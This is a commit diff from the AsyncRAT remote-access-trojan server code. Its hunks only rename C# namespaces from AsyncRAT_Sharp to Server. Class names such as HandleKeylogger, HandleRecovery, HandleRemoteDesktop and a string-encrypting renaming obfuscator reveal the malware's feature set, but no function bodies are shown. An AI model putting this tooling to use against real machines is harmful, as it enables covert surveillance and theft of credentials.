public partial class FormShell : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormTorrent
|
partial class FormTorrent
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.ComponentModel;
|
using System.ComponentModel;
|
||||||
@ -12,7 +12,7 @@ using System.Threading;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormTorrent : Form
|
public partial class FormTorrent : Form
|
||||||
{
|
{
|
@ -1,6 +1,6 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
@ -9,7 +9,7 @@ using System.Threading;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleChat
|
public class HandleChat
|
||||||
{
|
{
|
@ -1,16 +1,16 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleFileManager
|
public class HandleFileManager
|
||||||
{
|
{
|
@ -1,13 +1,13 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
class HandleKeylogger
|
class HandleKeylogger
|
||||||
{
|
{
|
@ -1,12 +1,12 @@
|
|||||||
using System;
|
using System;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using cGeoIp;
|
using cGeoIp;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleListView
|
public class HandleListView
|
||||||
{
|
{
|
@ -6,7 +6,7 @@ using System.Threading.Tasks;
|
|||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleLogs
|
public class HandleLogs
|
||||||
{
|
{
|
@ -1,9 +1,9 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandlePing
|
public class HandlePing
|
||||||
{
|
{
|
@ -1,12 +1,12 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleProcessManager
|
public class HandleProcessManager
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
@ -9,7 +9,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleRecovery
|
public class HandleRecovery
|
||||||
{
|
{
|
@ -1,14 +1,14 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleRemoteDesktop
|
public class HandleRemoteDesktop
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
@ -7,7 +7,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleReportWindow
|
public class HandleReportWindow
|
||||||
{
|
{
|
@ -1,6 +1,6 @@
|
|||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
@ -8,7 +8,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleShell
|
public class HandleShell
|
||||||
{
|
{
|
@ -1,11 +1,11 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public class HandleThumbnails
|
public class HandleThumbnails
|
||||||
{
|
{
|
@ -1,14 +1,14 @@
|
|||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using System;
|
using System;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using System.Drawing;
|
using System.Drawing;
|
||||||
using AsyncRAT_Sharp.Forms;
|
using Server.Forms;
|
||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Handle_Packet
|
namespace Server.Handle_Packet
|
||||||
{
|
{
|
||||||
public static class Packet
|
public static class Packet
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
@ -9,7 +9,7 @@ using System.Windows.Forms;
|
|||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public class AsyncTask
|
public class AsyncTask
|
||||||
{
|
{
|
@ -15,7 +15,7 @@ using System.Security.Cryptography.X509Certificates;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public static class CreateCertificate
|
public static class CreateCertificate
|
||||||
{
|
{
|
@ -3,7 +3,7 @@ using System.Runtime.InteropServices;
|
|||||||
using System.Security;
|
using System.Security;
|
||||||
|
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public static class IconInjector
|
public static class IconInjector
|
||||||
{
|
{
|
@ -1,7 +1,7 @@
|
|||||||
using System.Collections;
|
using System.Collections;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
//support.microsoft.com/en-us/help/319401/how-to-sort-a-listview-control-by-a-column-in-visual-c
|
//support.microsoft.com/en-us/help/319401/how-to-sort-a-listview-control-by-a-column-in-visual-c
|
||||||
public class ListViewColumnSorter : IComparer
|
public class ListViewColumnSorter : IComparer
|
@ -6,7 +6,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public static class ListviewDoubleBuffer
|
public static class ListviewDoubleBuffer
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public static class Methods
|
public static class Methods
|
||||||
{
|
{
|
@ -6,7 +6,7 @@ using System.Reflection;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Helper
|
namespace Server.Helper
|
||||||
{
|
{
|
||||||
public class ReferenceLoader : MarshalByRefObject
|
public class ReferenceLoader : MarshalByRefObject
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.MessagePack
|
namespace Server.MessagePack
|
||||||
{
|
{
|
||||||
public class BytesTools
|
public class BytesTools
|
||||||
{
|
{
|
@ -19,7 +19,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.MessagePack
|
namespace Server.MessagePack
|
||||||
{
|
{
|
||||||
public class MsgPackEnum : IEnumerator
|
public class MsgPackEnum : IEnumerator
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.MessagePack
|
namespace Server.MessagePack
|
||||||
{
|
{
|
||||||
public enum MsgPackType
|
public enum MsgPackType
|
||||||
{
|
{
|
@ -5,7 +5,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.MessagePack
|
namespace Server.MessagePack
|
||||||
{
|
{
|
||||||
class ReadTools
|
class ReadTools
|
||||||
{
|
{
|
@ -5,7 +5,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.MessagePack
|
namespace Server.MessagePack
|
||||||
{
|
{
|
||||||
class WriteTools
|
class WriteTools
|
||||||
{
|
{
|
@ -12,7 +12,7 @@ using System.Windows.Forms;
|
|||||||
This program Is distributed for educational purposes only.
|
This program Is distributed for educational purposes only.
|
||||||
*/
|
*/
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp
|
namespace Server
|
||||||
{
|
{
|
||||||
static class Program
|
static class Program
|
||||||
{
|
{
|
@ -8,7 +8,7 @@
|
|||||||
// </auto-generated>
|
// </auto-generated>
|
||||||
//------------------------------------------------------------------------------
|
//------------------------------------------------------------------------------
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Properties {
|
namespace Server.Properties {
|
||||||
using System;
|
using System;
|
||||||
|
|
||||||
|
|
||||||
@ -39,7 +39,7 @@ namespace AsyncRAT_Sharp.Properties {
|
|||||||
internal static global::System.Resources.ResourceManager ResourceManager {
|
internal static global::System.Resources.ResourceManager ResourceManager {
|
||||||
get {
|
get {
|
||||||
if (object.ReferenceEquals(resourceMan, null)) {
|
if (object.ReferenceEquals(resourceMan, null)) {
|
||||||
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("AsyncRAT_Sharp.Properties.Resources", typeof(Resources).Assembly);
|
global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Server.Properties.Resources", typeof(Resources).Assembly);
|
||||||
resourceMan = temp;
|
resourceMan = temp;
|
||||||
}
|
}
|
||||||
return resourceMan;
|
return resourceMan;
|
@ -8,7 +8,7 @@
|
|||||||
// </auto-generated>
|
// </auto-generated>
|
||||||
//------------------------------------------------------------------------------
|
//------------------------------------------------------------------------------
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Properties {
|
namespace Server.Properties {
|
||||||
|
|
||||||
|
|
||||||
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
|
[global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()]
|
@ -1,11 +1,11 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class Base64 : ICrypto
|
public class Base64 : ICrypto
|
||||||
{
|
{
|
@ -1,10 +1,10 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
using dnlib.DotNet.Emit;
|
using dnlib.DotNet.Emit;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class ClassesRenaming : IRenaming
|
public class ClassesRenaming : IRenaming
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
internal static class DecryptionHelper
|
internal static class DecryptionHelper
|
||||||
{
|
{
|
@ -1,10 +1,10 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
using dnlib.DotNet.Emit;
|
using dnlib.DotNet.Emit;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
|
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class FieldsRenaming : IRenaming
|
public class FieldsRenaming : IRenaming
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Collections.Generic;
|
|||||||
using System.Linq;
|
using System.Linq;
|
||||||
|
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public static class InjectHelper
|
public static class InjectHelper
|
||||||
{
|
{
|
@ -1,8 +1,8 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
|
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class MethodsRenaming : IRenaming
|
public class MethodsRenaming : IRenaming
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
using dnlib.DotNet.Emit;
|
using dnlib.DotNet.Emit;
|
||||||
using System;
|
using System;
|
||||||
@ -7,7 +7,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class NamespacesRenaming : IRenaming
|
public class NamespacesRenaming : IRenaming
|
||||||
{
|
{
|
@ -1,7 +1,7 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public class PropertiesRenaming : IRenaming
|
public class PropertiesRenaming : IRenaming
|
||||||
{
|
{
|
@ -3,7 +3,7 @@ using System.Collections.Generic;
|
|||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Classes
|
namespace Server.RenamingObfuscation.Classes
|
||||||
{
|
{
|
||||||
public static class Utils
|
public static class Utils
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
|
using Server.RenamingObfuscation.Classes;
|
||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
using dnlib.DotNet.Emit;
|
using dnlib.DotNet.Emit;
|
||||||
using System;
|
using System;
|
||||||
@ -8,7 +8,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation
|
namespace Server.RenamingObfuscation
|
||||||
{
|
{
|
||||||
public static class EncryptString
|
public static class EncryptString
|
||||||
{
|
{
|
@ -4,7 +4,7 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
|
namespace Server.RenamingObfuscation.Interfaces
|
||||||
{
|
{
|
||||||
public interface ICrypto
|
public interface ICrypto
|
||||||
{
|
{
|
@ -1,6 +1,6 @@
|
|||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation.Interfaces
|
namespace Server.RenamingObfuscation.Interfaces
|
||||||
{
|
{
|
||||||
public interface IRenaming
|
public interface IRenaming
|
||||||
{
|
{
|
@ -1,10 +1,10 @@
|
|||||||
using AsyncRAT_Sharp.RenamingObfuscation.Classes;
|
using Server.RenamingObfuscation.Classes;
|
||||||
using AsyncRAT_Sharp.RenamingObfuscation.Interfaces;
|
using Server.RenamingObfuscation.Interfaces;
|
||||||
using dnlib.DotNet;
|
using dnlib.DotNet;
|
||||||
|
|
||||||
// Credit github.com/srn-g/RenamingObfuscation
|
// Credit github.com/srn-g/RenamingObfuscation
|
||||||
// Fxied by nyan cat
|
// Fxied by nyan cat
|
||||||
namespace AsyncRAT_Sharp.RenamingObfuscation
|
namespace Server.RenamingObfuscation
|
||||||
{
|
{
|
||||||
public class Renaming
|
public class Renaming
|
||||||
{
|
{
|
Some files were not shown because too many files have changed in this diff Show More
Loading…
x
Reference in New Issue
Block a user